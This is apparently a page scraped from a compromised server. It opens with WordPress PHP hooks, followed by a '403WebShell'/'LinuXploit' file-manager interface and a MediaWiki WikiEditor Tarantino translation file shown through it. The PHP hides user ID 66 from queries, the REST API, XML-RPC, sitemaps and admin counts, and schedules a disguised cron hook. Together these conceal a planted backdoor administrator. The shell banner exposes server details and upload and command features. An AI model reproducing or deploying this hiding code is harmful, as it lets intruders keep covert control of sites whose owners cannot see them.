add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/wiki/extensions/WikiEditor/i18n/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/wiki/extensions/WikiEditor/i18n/roa-tara.json
{
	"@metadata": {
		"authors": [
			"Joetaras",
			"Reder"
		]
	},
	"wikieditor": "Wikitext avanzate pe le cangiaminde de l'inderfacce",
	"wikieditor-desc": "Dèje 'n'inderfaccia de cangiaminde avanzate d'u uicchiteste estendibbele",
	"wikieditor-toolbar": "Barre de le cangiaminde",
	"wikieditor-toolbar-desc": "Cange 'a pàgene d'a barre de le struminde cu l'usabbilità avanzate",
	"wikieditor-toolbar-preference": "Abbilite 'a barre de le struminde pe le cangiaminde",
	"wikieditor-toolbar-preference-help": "Quiste avène chiamate certe vote 'u 'cangiatore de uicchiteste d'u 2010'.",
	"wikieditor-toolbar-tool-bold": "Grascette",
	"wikieditor-toolbar-tool-bold-example": "Teste grascette",
	"wikieditor-toolbar-tool-italic": "Corsive",
	"wikieditor-toolbar-tool-italic-example": "Teste corsive",
	"wikieditor-toolbar-tool-link": "Collegamende",
	"wikieditor-toolbar-tool-link-title": "'Nzerisce 'nu collegamende",
	"wikieditor-toolbar-tool-link-int": "A 'na vôsce/pàgene de Uicchi",
	"wikieditor-toolbar-tool-link-int-target": "Titele d'a vôsce:",
	"wikieditor-toolbar-tool-link-int-target-tooltip": "Titele d'a pàgene o URL",
	"wikieditor-toolbar-tool-link-int-text": "Teste d'u collegamende:",
	"wikieditor-toolbar-tool-link-int-text-tooltip": "Mitte 'u teste ca avessa essere fatte vedè",
	"wikieditor-toolbar-tool-link-ext": "A 'na pàgena web fore da Uicchipèdie",
	"wikieditor-toolbar-tool-link-ext-target": "Colleghe 'n'URL:",
	"wikieditor-toolbar-tool-link-ext-text": "Teste d'u collegamende:",
	"wikieditor-toolbar-tool-link-insert": "'Nzerisce 'nu collegamende",
	"wikieditor-toolbar-tool-link-cancel": "Scangille",
	"wikieditor-toolbar-tool-link-int-target-status-exists": "'A pàgene esiste",
	"wikieditor-toolbar-tool-link-int-target-status-notexists": "'A pàgene non g'esiste",
	"wikieditor-toolbar-tool-link-int-target-status-invalid": "Titole invalide",
	"wikieditor-toolbar-tool-link-int-target-status-external": "Collegaminde fore a Uicchipèdie",
	"wikieditor-toolbar-tool-link-int-target-status-disambig": "Pàgene de disambbiguazione",
	"wikieditor-toolbar-tool-link-lookslikeinternal": "'A URL ca tu è specificate pare manghe ca vò ccù punde a 'n'otra pàgene de Uicchi. Ce vuè ccù face 'nu collegamende inderne?",
	"wikieditor-toolbar-tool-link-lookslikeinternal-int": "Collegamende jndr'à Uicchipèdie",
	"wikieditor-toolbar-tool-link-lookslikeinternal-ext": "Collegamende fore a Uicchipèdie",
	"wikieditor-toolbar-tool-file": "Immaggine e media",
	"wikieditor-toolbar-tool-file-title": "'Nzerisce 'nu file",
	"wikieditor-toolbar-file-target": "Nome d'u file:",
	"wikieditor-toolbar-file-caption": "'Ndestazione:",
	"wikieditor-toolbar-file-alt": "Teste alternative:",
	"wikieditor-toolbar-file-alt-help": "Puè ausà stu cambe facoltative pe scrivere 'na descrizione d'u teste pe le crestiane ca non ge riescene a 'ndrucà 'u fail. 'A descrizione avessa essere bella longhe pe ffà capì bbuène 'u scope e le 'mbormaziune date da l'elemende multimediale. Quiste jè 'mbortande assaije pe le utinde ca non ge 'ndrucane e pe le crestiane ca ausane 'nu softuer de letture scherme o browser de teste.",
	"wikieditor-toolbar-file-alt-help-label": "('Ndruche l'aijute)",
	"wikieditor-toolbar-file-size": "Dimenzione:",
	"wikieditor-toolbar-file-float": "Allineamende:",
	"wikieditor-toolbar-file-default": "(de base)",
	"wikieditor-toolbar-file-format": "Formate:",
	"wikieditor-toolbar-file-format-none": "ninde",
	"wikieditor-toolbar-tool-file-insert": "'Nzerisce",
	"wikieditor-toolbar-tool-file-cancel": "Annulle",
	"wikieditor-toolbar-tool-file-upload": "Careche",
	"wikieditor-toolbar-tool-signature": "Firme e orarie",
	"wikieditor-toolbar-section-advanced": "Avanzate",
	"wikieditor-toolbar-tool-heading": "Testate",
	"wikieditor-toolbar-tool-heading-1": "Levèlle 1",
	"wikieditor-toolbar-tool-heading-2": "Levèlle 2",
	"wikieditor-toolbar-tool-heading-3": "Levèlle 3",
	"wikieditor-toolbar-tool-heading-4": "Levèlle 4",
	"wikieditor-toolbar-tool-heading-5": "Levèlle 5",
	"wikieditor-toolbar-tool-heading-example": "Teste d'a testate",
	"wikieditor-toolbar-group-format": "Formate",
	"wikieditor-toolbar-tool-ulist": "Elenghe pundate",
	"wikieditor-toolbar-tool-ulist-example": "Elemende de l'elenghe pundate",
	"wikieditor-toolbar-tool-olist": "Elenghe numerate",
	"wikieditor-toolbar-tool-olist-example": "Elemende de l'elenghe numerate",
	"wikieditor-toolbar-tool-nowiki": "No scè penzanne 'a formattazione de Uicchi",
	"wikieditor-toolbar-tool-nowiki-example": "Sckaffe teste non formattate aqquà",
	"wikieditor-toolbar-tool-redirect": "Redirezione",
	"wikieditor-toolbar-tool-redirect-example": "Nome d'a pàgene de destinazione",
	"wikieditor-toolbar-tool-big": "Granne",
	"wikieditor-toolbar-tool-big-example": "Teste granne",
	"wikieditor-toolbar-tool-small": "Piccinne",
	"wikieditor-toolbar-tool-small-example": "Teste piccinne",
	"wikieditor-toolbar-tool-superscript": "Sovrascritte",
	"wikieditor-toolbar-tool-superscript-example": "Teste sovrascritte",
	"wikieditor-toolbar-tool-subscript": "Sottoscrive",
	"wikieditor-toolbar-tool-subscript-example": "Teste sottoscritte",
	"wikieditor-toolbar-group-insert": "'Nzerisce",
	"wikieditor-toolbar-tool-gallery": "Gallerìe fotografeche",
	"wikieditor-toolbar-tool-gallery-example": "Example.jpg|Titole1\nExample.jpg|Titole2",
	"wikieditor-toolbar-tool-newline": "Linèa nove",
	"wikieditor-toolbar-tool-table": "Tabbelle",
	"wikieditor-toolbar-tool-table-example-cell-text": "Teste d'a celle",
	"wikieditor-toolbar-tool-table-example-header": "Teste d'a testate",
	"wikieditor-toolbar-tool-table-example-caption": "Teste d'u titole",
	"wikieditor-toolbar-tool-table-title": "'Nzerisce 'na tabbelle",
	"wikieditor-toolbar-tool-table-dimensions-rows": "Righe",
	"wikieditor-toolbar-tool-table-dimensions-columns": "Culonne",
	"wikieditor-toolbar-tool-table-dimensions-header": "Aggiunge righe de testate",
	"wikieditor-toolbar-tool-table-wikitable": "Stile cu le borde",
	"wikieditor-toolbar-tool-table-sortable": "Fà 'a tabbelle ordenabbele",
	"wikieditor-toolbar-tool-table-example": "Teste d'a celle",
	"wikieditor-toolbar-tool-table-preview": "Andeprime",
	"wikieditor-toolbar-tool-table-insert": "Inzerisce",
	"wikieditor-toolbar-tool-table-cancel": "Annulle",
	"wikieditor-toolbar-tool-table-toomany": "'U 'nzerimende de 'na tabbelle cu cchiù de $1 {{PLURAL:$1|celle}} non g'è possibbele cu stu dialoghe.",
	"wikieditor-toolbar-tool-table-invalidnumber": "Tu non g'è mise 'nu numere valide de righe o culonne.",
	"wikieditor-toolbar-tool-table-zero": "Tu non ge puè inzerì 'na tabbelle cù zero righe o culonne.",
	"wikieditor-toolbar-tool-replace": "Cirche e sostituisce",
	"wikieditor-toolbar-tool-replace-title": "Cirche e sostituisce",
	"wikieditor-toolbar-tool-replace-search": "Cirche pe:",
	"wikieditor-toolbar-tool-replace-replace": "Sostituisce cu:",
	"wikieditor-toolbar-tool-replace-case": "Combronde maiuscole e minuscole",
	"wikieditor-toolbar-tool-replace-regex": "Tratte 'a stringhe de ricerche cumme a 'n'espressione regolare",
	"wikieditor-toolbar-tool-replace-button-findnext": "Cirche 'u prosseme",
	"wikieditor-toolbar-tool-replace-button-replace": "Sostituisce",
	"wikieditor-toolbar-tool-replace-button-replaceall": "Sostituisce tutte",
	"wikieditor-toolbar-tool-replace-close": "Chiude",
	"wikieditor-toolbar-tool-replace-nomatch": "'A ricerca toje non g'à acchiate ninde.",
	"wikieditor-toolbar-tool-replace-success": "$1 {{PLURAL:$1|sostituzione|sostituziune}} fatte.",
	"wikieditor-toolbar-tool-replace-emptysearch": "Tu non g'è mise ninde pe fà 'a ricerche.",
	"wikieditor-toolbar-tool-replace-invalidregex": "L'espressione regolare ca tu è 'nzerite jè invalide: $1",
	"wikieditor-toolbar-tool-replace-word": "Combronde tutte 'a parole",
	"wikieditor-toolbar-section-characters": "Carattere speciale",
	"wikieditor-toolbar-section-help": "Ajiute",
	"wikieditor-toolbar-help-heading-description": "Descrizione",
	"wikieditor-toolbar-help-heading-syntax": "Cè è scritte",
	"wikieditor-toolbar-help-heading-result": "Cè vuè",
	"wikieditor-toolbar-help-page-format": "Formattanne",
	"wikieditor-toolbar-help-page-link": "Collegaminde",
	"wikieditor-toolbar-help-page-heading": "Testate",
	"wikieditor-toolbar-help-page-list": "Elenghe",
	"wikieditor-toolbar-help-page-file": "File",
	"wikieditor-toolbar-help-page-discussion": "'Ngazzamende",
	"wikieditor-toolbar-help-content-italic-description": "Corsive",
	"wikieditor-toolbar-help-content-italic-example": "Teste Corsive",
	"wikieditor-toolbar-help-content-bold-description": "Grascette",
	"wikieditor-toolbar-help-content-bold-example": "Teste Grascette",
	"wikieditor-toolbar-help-content-bolditalic-description": "Grascette &amp; corsive",
	"wikieditor-toolbar-help-content-bolditalic-example": "Grascette & corsive",
	"wikieditor-toolbar-help-content-ilink-description": "Collegamende inderne",
	"wikieditor-toolbar-help-content-xlink-description": "Collegamende fore a Uicchipèdie",
	"wikieditor-toolbar-help-content-heading2-description": "2° levèlle de testate",
	"wikieditor-toolbar-help-content-heading2-example": "Teste d'a testate",
	"wikieditor-toolbar-help-content-heading3-description": "3° levèlle de testate",
	"wikieditor-toolbar-help-content-heading3-example": "Teste d'a testate",
	"wikieditor-toolbar-help-content-heading4-description": "4° levèlle de testate",
	"wikieditor-toolbar-help-content-heading4-example": "Teste d'a testate",
	"wikieditor-toolbar-help-content-heading5-description": "5° levèlle de testate",
	"wikieditor-toolbar-help-content-heading5-example": "Teste d'a testate",
	"wikieditor-toolbar-help-content-ulist-description": "Elenghe pundate",
	"wikieditor-toolbar-help-content-olist-description": "Elenghe numerate",
	"wikieditor-toolbar-help-content-file-description": "File 'ngorporate",
	"wikieditor-toolbar-help-content-file-syntax": "[[$1:Example.png|$2|$3]]",
	"wikieditor-toolbar-help-content-file-caption": "Teste d'u titole",
	"wikieditor-toolbar-help-content-signaturetimestamp-description": "firme cu l'orarie",
	"wikieditor-toolbar-help-content-signature-description": "Firme",
	"wikieditor-toolbar-help-content-indent-description": "Idente"
}

Youez - 2016 - github.com/yon3zu
LinuXploit